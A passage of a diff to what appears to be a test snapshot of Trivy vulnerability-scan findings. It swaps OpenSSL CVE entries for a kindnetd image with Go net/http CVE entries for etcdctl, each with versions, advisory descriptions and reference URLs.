"https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230322.txt", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2650", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1551", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", - "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", - "https://access.redhat.com/security/cve/CVE-2019-1551", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", - "https://github.com/openssl/openssl/pull/10575", - "https://linux.oracle.com/cve/CVE-2019-1551.html", - "https://linux.oracle.com/errata/ELSA-2020-4514.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", - "https://seclists.org/bugtraq/2019/Dec/39", - "https://seclists.org/bugtraq/2019/Dec/46", - "https://security.gentoo.org/glsa/202004-10", - "https://security.netapp.com/advisory/ntap-20191210-0001/", - "https://ubuntu.com/security/notices/USN-4376-1", - "https://ubuntu.com/security/notices/USN-4504-1", - "https://usn.ubuntu.com/4376-1/", - "https://usn.ubuntu.com/4504-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-1551", - "https://www.debian.org/security/2019/dsa-4594", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20191206.txt", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.tenable.com/security/tns-2019-09", - "https://www.tenable.com/security/tns-2020-03", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-10", - ], - }, - "category": "Vulnerability", - "description": "There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH512 are considered just feasible. However, for an attack the target would have to re-use the DH512 private key, which is not recommended anyway. Also applications directly using the low level API BN_mod_exp may be affected if they use BN_FLG_CONSTTIME. Fixed in OpenSSL 1.1.1e (Affected 1.1.1-1.1.1d). Fixed in OpenSSL 1.0.2u (Affected 1.0.2-1.0.2t).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: Integer overflow in RSAZ modular exponentiation on x86_64", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1551", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1551", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://github.com/openssl/openssl/pull/10575", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-1551.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4514.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://seclists.org/bugtraq/2019/Dec/39", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://seclists.org/bugtraq/2019/Dec/46", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202004-10", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20191210-0001/", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4376-1", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4504-1", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4376-1/", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4504-1/", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1551", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://www.debian.org/security/2019/dsa-4594", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20191206.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2019-09", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-03", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 